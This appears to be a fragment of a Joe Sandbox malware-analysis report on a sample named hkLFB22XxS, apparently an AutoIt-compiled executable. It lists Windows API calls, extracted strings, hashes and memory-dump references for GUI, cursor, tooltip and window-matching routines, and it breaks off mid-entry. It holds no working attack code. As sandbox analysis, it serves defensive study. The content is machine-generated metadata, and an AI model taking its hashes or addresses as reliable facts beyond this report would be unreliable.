                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 384ca873484ccf7d8d53df5dc81dbdba68308de52e2584b577c27f2d39133b9e
                                                            • Instruction ID: b10075154916d623a27ab5f017abe78ccfa006a8d6bc77d3f86d4426ce86ee12
                                                            • Opcode Fuzzy Hash: 384ca873484ccf7d8d53df5dc81dbdba68308de52e2584b577c27f2d39133b9e
                                                            • Instruction Fuzzy Hash: 2251BE7068424CAACB08EB14C9A6FBD73B2FF24349760C019E45EE7694CB38DD419B63
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 299407e9a03369f065baabd081035fdbfb49121f4b594119173afcf30e49f74a
                                                            • Instruction ID: 5f44b2d35a4317b24d0bd190d5a7a1c38d1dd106b93a5aa143ac7ccb2570a8d6
                                                            • Opcode Fuzzy Hash: 299407e9a03369f065baabd081035fdbfb49121f4b594119173afcf30e49f74a
                                                            • Instruction Fuzzy Hash: B3811870644619BACF24AF68DC82FFA77ACFF15714F044025FD85EA182FB64DA91C292
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0089AB99
                                                            • SetTextColor.GDI32(?,?), ref: 0089AB9D
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0089ABB3
                                                            • GetSysColor.USER32(0000000F), ref: 0089ABBE
                                                            • CreateSolidBrush.GDI32(?), ref: 0089ABC3
                                                            • GetSysColor.USER32(00000011), ref: 0089ABDB
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0089ABE9
                                                            • SelectObject.GDI32(?,00000000), ref: 0089ABFA
                                                            • SetBkColor.GDI32(?,00000000), ref: 0089AC03
                                                            • SelectObject.GDI32(?,?), ref: 0089AC10
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0089AC2F
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0089AC46
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0089AC5B
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0089ACA7
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0089ACCE
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0089ACEC
                                                            • DrawFocusRect.USER32(?,?), ref: 0089ACF7
                                                            • GetSysColor.USER32(00000011), ref: 0089AD05
                                                            • SetTextColor.GDI32(?,00000000), ref: 0089AD0D
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0089AD21
                                                            • SelectObject.GDI32(?,0089A869), ref: 0089AD38
                                                            • DeleteObject.GDI32(?), ref: 0089AD43
                                                            • SelectObject.GDI32(?,?), ref: 0089AD49
                                                            • DeleteObject.GDI32(?), ref: 0089AD4E
                                                            • SetTextColor.GDI32(?,?), ref: 0089AD54
                                                            • SetBkColor.GDI32(?,?), ref: 0089AD5E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: f47e25b25301aaad7d2edc0bd21c2a6171aad6c8a10c5e585c26beba6237b8b4
                                                            • Instruction ID: 9ce4da13072c64511a6419068d37a355f7f2eda88a774307b3b63b5eaca7d74f
                                                            • Opcode Fuzzy Hash: f47e25b25301aaad7d2edc0bd21c2a6171aad6c8a10c5e585c26beba6237b8b4
                                                            • Instruction Fuzzy Hash: 2D613F71900218EFDF15AFA8DC48EAE7B79FB08320F194126FA15EB2A1D7759D40DB90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00898D34
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00898D45
                                                            • CharNextW.USER32(0000014E), ref: 00898D74
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00898DB5
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00898DCB
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00898DDC
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00898DF9
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00898E45
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00898E5B
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00898E8C
                                                            • _memset.LIBCMT ref: 00898EB1
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00898EFA
                                                            • _memset.LIBCMT ref: 00898F59
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00898F83
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00898FDB
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00899088
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 008990AA
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008990F4
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00899121
                                                            • DrawMenuBar.USER32(?), ref: 00899130
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00899158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: fdf0f492f744f33ba0e9a6fb04015eadfc7815507692f3694739333fc760c37c
                                                            • Instruction ID: 0459071810d5d0cac82c3b993a96c6ce2b25bc79596c56c7119fbbf7ee0c21e5
                                                            • Opcode Fuzzy Hash: fdf0f492f744f33ba0e9a6fb04015eadfc7815507692f3694739333fc760c37c
                                                            • Instruction Fuzzy Hash: 6CE19F7090120AEFDF20AF64CC84AEE7B78FF05714F08815AF915EA291DB748A81DF61
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00894C51
                                                            • GetDesktopWindow.USER32 ref: 00894C66
                                                            • GetWindowRect.USER32(00000000), ref: 00894C6D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00894CCF
                                                            • DestroyWindow.USER32(?), ref: 00894CFB
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00894D24
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00894D42
                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00894D68
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00894D7D
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00894D90
                                                            • IsWindowVisible.USER32(?), ref: 00894DB0
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00894DCB
                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00894DDF
                                                            • GetWindowRect.USER32(?,?), ref: 00894DF7
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00894E1D
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00894E37
                                                            • CopyRect.USER32(?,?), ref: 00894E4E
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00894EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: 608861c19c89f6dba9f71dafbf32204a8967fe5b17a2ed12c86d4b47df249941
                                                            • Instruction ID: 9c6af644bfd1adbb4564c9c5ac0ff77c14c63809bea1303ee820b9452d436f9e
                                                            • Opcode Fuzzy Hash: 608861c19c89f6dba9f71dafbf32204a8967fe5b17a2ed12c86d4b47df249941
                                                            • Instruction Fuzzy Hash: 09B14771608341AFDB04EF68C845F6ABBE4FF88314F048919F599DB2A2D771E845CB92
                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008746E8
                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0087470E
                                                            • _wcscpy.LIBCMT ref: 0087473C
                                                            • _wcscmp.LIBCMT ref: 00874747
                                                            • _wcscat.LIBCMT ref: 0087475D
                                                            • _wcsstr.LIBCMT ref: 00874768
                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00874784
                                                            • _wcscat.LIBCMT ref: 008747CD
                                                            • _wcscat.LIBCMT ref: 008747D4
                                                            • _wcsncpy.LIBCMT ref: 008747FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 699586101-1459072770
                                                            • Opcode ID: 0b822b13daa02fce1520965588cc9fea8252bf300bd8b8eb94a5a9531e59d7b4
                                                            • Instruction ID: 5a306876e63b2db60f7e93d3d40706a09aa2f44a96f756273f79343ea8309666
                                                            • Opcode Fuzzy Hash: 0b822b13daa02fce1520965588cc9fea8252bf300bd8b8eb94a5a9531e59d7b4
                                                            • Instruction Fuzzy Hash: 7741F5716002287AEB18B7689C47EBF77BCFF81710F04406AF909E6182EF75D90196E6
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008128BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 008128C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008128EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 008128F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 0081291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00812939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00812949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0081297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00812990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 008129AE
                                                            • GetStockObject.GDI32(00000011), ref: 008129CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 008129D5
                                                              • Part of subcall function 00812344: GetCursorPos.USER32(?), ref: 00812357
                                                              • Part of subcall function 00812344: ScreenToClient.USER32(008D67B0,?), ref: 00812374
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000001), ref: 00812399
                                                              • Part of subcall function 00812344: GetAsyncKeyState.USER32(00000002), ref: 008123A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,00811256), ref: 008129FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: 30a413c53a14a12ea8aa8e68dd635b23a53c276a49b27b4b0a9a3ae1f92d26ca
                                                            • Instruction ID: 8afbaf533734b434cea058a927d819182a6e4cdb0675acdb90cccc65d4622830
                                                            • Opcode Fuzzy Hash: 30a413c53a14a12ea8aa8e68dd635b23a53c276a49b27b4b0a9a3ae1f92d26ca
                                                            • Instruction Fuzzy Hash: F7B14E7160120AEFDB14DFA8DC45BEE7BB9FF08714F14422AFA15E6290DB749860CB50
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 008940F6
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008941B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: 3c0abe990a47332c482c242df3786ecf3c55dee8a286eeae16512cfee341aacf
                                                            • Instruction ID: e1c992ac4c545eb3261e01c13e3d11c96259db72298edb00d11ca19d51e2e8ec
                                                            • Opcode Fuzzy Hash: 3c0abe990a47332c482c242df3786ecf3c55dee8a286eeae16512cfee341aacf
                                                            • Instruction Fuzzy Hash: C9A16F702142059BCB14FF64C951E6A73A9FF94314F18596CF896DB792DB30EC4ACB82
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00885309
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00885314
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0088531F
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 0088532A
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00885335
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00885340
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0088534B
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00885356
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00885361
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0088536C
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00885377
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00885382
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0088538D
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00885398
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 008853A3
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 008853AE
                                                            • GetCursorInfo.USER32(?), ref: 008853BE
                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 008853E9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 8d58af32315f8099611390241f37cda5608f58d651071d4692a216b4c9f5221a
                                                            • Instruction ID: 549b501776ebaf73c71e5d93c9ff9a6b4b25a013617cc1c712954755c5cbf044
                                                            • Opcode Fuzzy Hash: 8d58af32315f8099611390241f37cda5608f58d651071d4692a216b4c9f5221a
                                                            • Instruction Fuzzy Hash: DD416270E043196ADB10AFBA8C4986EFEB8FF51B50B10452BE509E7291DAB8A4008F55
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0086AAA5
                                                            • __swprintf.LIBCMT ref: 0086AB46
                                                            • _wcscmp.LIBCMT ref: 0086AB59
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0086ABAE
                                                            • _wcscmp.LIBCMT ref: 0086ABEA
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0086AC21
                                                            • GetDlgCtrlID.USER32(?), ref: 0086AC73
                                                            • GetWindowRect.USER32(?,?), ref: 0086ACA9
                                                            • GetParent.USER32(?), ref: 0086ACC7
                                                            • ScreenToClient.USER32(00000000), ref: 0086ACCE
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0086AD48
                                                            • _wcscmp.LIBCMT ref: 0086AD5C
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0086AD82
                                                            • _wcscmp.LIBCMT ref: 0086AD96
                                                              • Part of subcall function 0083386C: _iswctype.LIBCMT ref: 00833874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 04e30688e1edd1abcab8fb7541953cfdcb8f43b742efed080bdd57a0220752a4
                                                            • Instruction ID: 726777711cf255258bb10ba83eeb0cd6a6f4d1a34e1be324f066e7b7a1e9f05f
                                                            • Opcode Fuzzy Hash: 04e30688e1edd1abcab8fb7541953cfdcb8f43b742efed080bdd57a0220752a4
                                                            • Instruction Fuzzy Hash: B6A1D071204306AFD718EF64C884FAAB7E8FF44355F00462AFA99E2191DB30E955CF92
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0086B3DB
                                                            • _wcscmp.LIBCMT ref: 0086B3EC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0086B414
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0086B431
                                                            • _wcscmp.LIBCMT ref: 0086B44F
                                                            • _wcsstr.LIBCMT ref: 0086B460
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0086B498
                                                            • _wcscmp.LIBCMT ref: 0086B4A8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0086B4CF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0086B518
                                                            • _wcscmp.LIBCMT ref: 0086B528
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0086B550
                                                            • GetWindowRect.USER32(00000004,?), ref: 0086B5B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: de3e644be195307c91c3b2b4913e04d03b645df4b5e45dd318be50fe7d96215e
                                                            • Instruction ID: e8602f0195f5b73f80973e94b87466debd2ca4d5f4324076a58acf3f37c4fa69
                                                            • Opcode Fuzzy Hash: de3e644be195307c91c3b2b4913e04d03b645df4b5e45dd318be50fe7d96215e
                                                            • Instruction Fuzzy Hash: B381B0710083059BDB05DF14C885FAA7BE8FF94318F08856AFD86DA192DB34DD85CBA2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: 934d510b012264f5f6eb378266f8a43843f0f0876b4d7108c07cd383fccf1007
                                                            • Instruction ID: 7e528112d85f0ab3fdb21d974f9bcc5ba36b1a2768d909a31d22e9fb2b260267
                                                            • Opcode Fuzzy Hash: 934d510b012264f5f6eb378266f8a43843f0f0876b4d7108c07cd383fccf1007
                                                            • Instruction Fuzzy Hash: 1F31CB31A44209A6DB10FA68DD57FEE77B8FF20754F200068F491F12D2EF65AE84C692
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 0086C4D4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0086C4E6
                                                            • SetWindowTextW.USER32(?,?), ref: 0086C4FD
                                                            • GetDlgItem.USER32(?,000003EA), ref: 0086C512
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0086C518
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0086C528
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0086C52E
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0086C54F
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0086C569
                                                            • GetWindowRect.USER32(?,?), ref: 0086C572
                                                            • SetWindowTextW.USER32(?,?), ref: 0086C5DD
                                                            • GetDesktopWindow.USER32 ref: 0086C5E3
                                                            • GetWindowRect.USER32(00000000), ref: 0086C5EA
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0086C636
                                                            • GetClientRect.USER32(?,?), ref: 0086C643
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0086C668
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0086C693
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
